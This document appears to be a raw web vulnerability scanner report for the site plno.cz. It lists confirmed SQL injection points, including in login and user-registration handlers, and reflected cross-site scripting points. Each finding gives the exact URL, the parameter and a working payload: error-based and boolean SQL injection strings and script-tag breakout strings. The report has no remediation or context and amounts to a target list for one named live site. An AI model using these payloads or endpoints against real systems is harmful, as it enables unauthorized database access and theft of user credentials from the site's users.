- SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo=' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='&zkr=0
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/kliknuto.asp?cl=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cl
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo=' OR 'ns'='ns&zkr=0
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&zkr=0
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=%27&zkr=3829
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=NSFTW&zkr=3829
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: NSFTW
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/kliknuto.asp?cl=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cl
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/VlozUzivatele.asp
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: fax1
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/OvereniUzivatele.asp
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/VlozUzivatele.asp
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: fax2
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o='"--></style></script><script>alert(0x000449)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000449)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo='"--></style></script><script>alert(0x000460)</script>&zkr=0
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000460)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o='"--></style></script><script>alert(0x000496)</script>&zkr=3829
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000496)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/registrace.asp?email='"--></style></script><script>netsparker(0x0004FA)</script>&fax1=3&fax2=3&hsl1=3&hsl2=3&info=N&jmeno=3&K=3&kod=3&login=3&obec=3&pozn1=3&prijmeni=3&psc=3&report=N&tel1=3&tel2=3&ulice=3&UzN=3&zeme=1&e=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004FA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/registrace.asp?email=netsparker@example.com&fax1=3&fax2=3&hsl1='"--></style></script><script>netsparker(0x0005AD)</script>&hsl2=3&info=N&jmeno=3&K=3&kod=3&login=3&obec=3&pozn1=3&prijmeni=3&psc=3&report=N&tel1=3&tel2=3&ulice=3&UzN=3&zeme=1&h=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: hsl1
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0005AD)</script>
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/registrace.asp
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Form target action: data/VlozUzivatele.asp
- ||| Robots.txt Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.plno.cz/robots.txt
- Interesting Robots.txt Entries:
- Disallow: /DATA/
- Disallow: /NEWS/
- Disallow: /NEWS/DATA/
- ||| MySQL Database Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))